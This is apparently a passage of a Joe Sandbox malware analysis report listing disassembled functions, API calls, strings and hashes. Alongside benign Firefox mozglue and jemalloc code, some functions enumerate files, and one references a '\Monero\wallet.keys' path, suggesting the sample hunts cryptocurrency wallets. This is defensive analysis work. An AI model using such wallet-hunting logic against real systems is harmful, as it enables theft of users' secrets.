floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6135E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6136CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6138BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6139EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C613EE2

Part of subcall function 6C616180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6161DD
Part of subcall function 6C616180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C61622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6140F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C614157

Part of subcall function 6C616180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C616250
Part of subcall function 6C616180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C614448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C61484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C614863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C614878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C614896
free.MOZGLUE ref: 6C61489F

Strings

, xrefs: 6C614CD2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: fd10845a4052270a1f8799bb4ec97ff937a77d3a77bb8918379db1c6928400b7
Instruction ID: 8b8b565b9167b72a69564241299689ed95347ea894ff7f285d44ce5cb24b4e13
Opcode Fuzzy Hash: fd10845a4052270a1f8799bb4ec97ff937a77d3a77bb8918379db1c6928400b7
Instruction Fuzzy Hash: 88F25C74908B808FC731CF29C08469AFBF1FF8A359F118A5ED98997711DB719886CB46

Function 6C5C64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5C64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5C64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C5C6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C5C6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5C652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C5C671C
GetCurrentProcess.KERNEL32 ref: 6C5C6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5C672F
GetCurrentProcess.KERNEL32 ref: 6C5C6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5C6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C5C6A80
GetSystemInfo.KERNEL32(?), ref: 6C5C6ABE
__Init_thread_footer.LIBCMT ref: 6C5C6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5C6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5C6AF7

Strings

nvdxgiwrap.dll, xrefs: 6C5C6513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C5C6798
detoured.dll, xrefs: 6C5C64DA
nvd3d9wrap.dll, xrefs: 6C5C6500
_etoured.dll, xrefs: 6C5C64ED
user32.dll, xrefs: 6C5C6526

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 3b1e63bcdbffe9864a2ab533186d419a7891d74206fcd59682c2ae6a7ba4ecf1
Instruction ID: 8e95a2572b5db390a04691bf752502b15581ff5855b3c2c66d3156c365601c59
Opcode Fuzzy Hash: 3b1e63bcdbffe9864a2ab533186d419a7891d74206fcd59682c2ae6a7ba4ecf1
Instruction Fuzzy Hash: B9F1D570A05319DFDB20CF65CC88BAAB7B4EF45318F14429DD809A7641DB31AE85CF96

Function 002638B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 002638CC
FindFirstFileA.KERNEL32(?,?), ref: 002638E3
lstrcat.KERNEL32(?,?), ref: 00263935
StrCmpCA.SHLWAPI(?,00270F70), ref: 00263947
StrCmpCA.SHLWAPI(?,00270F74), ref: 0026395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00263C67
FindClose.KERNEL32(000000FF), ref: 00263C7C

Strings

%s\%s, xrefs: 0026397A
%s\%s\%s, xrefs: 00263A4A
%s%s, xrefs: 00263AAD
%s\%s, xrefs: 00263A6F
%s\*, xrefs: 002638C0

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 1804e1840c92020a14bb829832dba3027132d01b6ec80111252d368f981f394b
Instruction ID: 58e5bcbf427c505792f1c115365fe2b7a56e3f0db7b7153681b4a930c6191884
Opcode Fuzzy Hash: 1804e1840c92020a14bb829832dba3027132d01b6ec80111252d368f981f394b
Instruction Fuzzy Hash: CFA152B1A102099BDB24EFA4DC85FEE7378BB94300F044599F50D96141EB759BE4CFA2

Function 6C61C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61C5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61C6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C61C74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C61C7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C61C9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61CC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C61CD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61DB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C61DB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C61DB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61DD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C61DE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C61E360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C61E432
memcpy.VCRUNTIME140(?,?,?), ref: 6C61E472

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: a4f72f75e76007d798609a35a35062becbf606ec65c63b0a3961bb16e3a9b2bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 6D339D71E0421A8FCB04CFACC8806EDBBF2FF49314F288269D955ABB55D731A945CB94

Function 6C5DED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C5DEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C5DEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C5E1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5E16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C5E1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C5E1A3E

Strings

~q[l, xrefs: 6C5DED13
~q[l, xrefs: 6C5DED10

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~q[l$~q[l
API String ID: 3693777188-397351531
Opcode ID: 2b1de380d84d618ac7f08f90cf913a59f5503290c8aaf3afea8960f43dde16c8
Instruction ID: 8201917eb2cabd5025109ad371b9c073eea5464d21602d2015a9988135fa0125
Opcode Fuzzy Hash: 2b1de380d84d618ac7f08f90cf913a59f5503290c8aaf3afea8960f43dde16c8
Instruction Fuzzy Hash: 28B31B71E04229CFDB14CFA8C890A9DB7B2FF89304F1582A9D459AB755D730AD86CF90

Function 6C5CFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C63E7B8), ref: 6C5CFF81
LeaveCriticalSection.KERNEL32(6C63E7B8), ref: 6C5D022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C5D0240
EnterCriticalSection.KERNEL32(6C63E768), ref: 6C5D025B
LeaveCriticalSection.KERNEL32(6C63E768), ref: 6C5D027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5CFE99, 6C5CFEB7, 6C5CFED3, 6C5D0DB8, 6C5D0DD3, 6C5D19B4
<jemalloc>, xrefs: 6C5D0D62, 6C5D0D76, 6C5D0DA7
: (malloc) Error in VirtualFree(), xrefs: 6C5D0D67, 6C5D0D7B, 6C5D0DAC

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 89277808d8b44bad73297d3fe3bf88acc02c9b965c456aaf4d9471f523fec0a9
Instruction ID: 37a8338dedb5155b522afae37a531c4444c1997888e8997ad3638171d33848fd
Opcode Fuzzy Hash: 89277808d8b44bad73297d3fe3bf88acc02c9b965c456aaf4d9471f523fec0a9
Instruction Fuzzy Hash: 1DC2AC71A057418FD714CF2DC880716BBE1AFC5328F29C66EE8A98B795D771E801CB89

Function 00264570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00264580
RtlAllocateHeap.NTDLL(00000000), ref: 00264587
wsprintfA.USER32 ref: 002645A6
FindFirstFileA.KERNEL32(?,?), ref: 002645BD
StrCmpCA.SHLWAPI(?,00270FC4), ref: 002645EB
StrCmpCA.SHLWAPI(?,00270FC8), ref: 00264601
FindNextFileA.KERNEL32(000000FF,?), ref: 0026468B
FindClose.KERNEL32(000000FF), ref: 002646A0
lstrcat.KERNEL32(?,00D4E948), ref: 002646C5
lstrcat.KERNEL32(?,00D4D600), ref: 002646D8
lstrlen.KERNEL32(?), ref: 002646E5
lstrlen.KERNEL32(?), ref: 002646F6

Strings

%s\*, xrefs: 0026459A
%s\%s, xrefs: 0026461B

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: b3c53c17be135e0bc62461e33ac81544d4994b89f464822d3a7616a8a97a8087
Instruction ID: d9a0d7bb1ebeefefcde6579b815ca3cd4110dc786881306e5c4f5dc5a47d43b8
Opcode Fuzzy Hash: b3c53c17be135e0bc62461e33ac81544d4994b89f464822d3a7616a8a97a8087
Instruction Fuzzy Hash: 405156B15502189BCB24FB70DC89FED737CAB54700F4045A9F64992190EF74DBA48F96

Function 0025ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0025ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0025ED55
StrCmpCA.SHLWAPI(?,00271538), ref: 0025EDAB
StrCmpCA.SHLWAPI(?,0027153C), ref: 0025EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0025F2AE
FindClose.KERNEL32(000000FF), ref: 0025F2C3

Strings

%s\*.*, xrefs: 0025ED32

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: db0a23df65a3980c223952f7fbb5bf04b79b4ff9fff41140399e0d12238dff43
Instruction ID: 72f3efbef136b8a8f6de6da9e89740effda7a5e82b0519bc094721c2eb62da37
Opcode Fuzzy Hash: db0a23df65a3980c223952f7fbb5bf04b79b4ff9fff41140399e0d12238dff43
Instruction Fuzzy Hash: 74E1C2719211189ADB55FB60DD92EEE7338AF54300F4045A9B50B73092EE306FEACF96

Function 6C5DD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD4F2
LeaveCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD50B

Part of subcall function 6C5BCFE0: EnterCriticalSection.KERNEL32(6C63E784), ref: 6C5BCFF6
Part of subcall function 6C5BCFE0: LeaveCriticalSection.KERNEL32(6C63E784), ref: 6C5BD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD52E
EnterCriticalSection.KERNEL32(6C63E7DC), ref: 6C5DD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5DD6A6
LeaveCriticalSection.KERNEL32(6C63E7DC), ref: 6C5DD712
LeaveCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5DD7EA

Strings

<jemalloc>, xrefs: 6C5DD827
: (malloc) Error initializing arena, xrefs: 6C5DD82C

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 7e9c4073f07c060aecf7b533065ad96cde8656b1d36594d3c45577f2c8ae8101
Instruction ID: 368a8e0f442a19fa1bee434107a0d7c062bdd0c96d224c1753af02b0f284f61f
Opcode Fuzzy Hash: 7e9c4073f07c060aecf7b533065ad96cde8656b1d36594d3c45577f2c8ae8101
Instruction Fuzzy Hash: 1191C271A047018FD724CF2DC89472AB7F1EB89314F16592EE59A87A81D730F845CFAA

Function 0025DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00270C2E), ref: 0025DE5E
StrCmpCA.SHLWAPI(?,002714C8), ref: 0025DEAE
StrCmpCA.SHLWAPI(?,002714CC), ref: 0025DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0025E3E0
FindClose.KERNEL32(000000FF), ref: 0025E3F2

Strings

\*.*, xrefs: 0025DE26

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
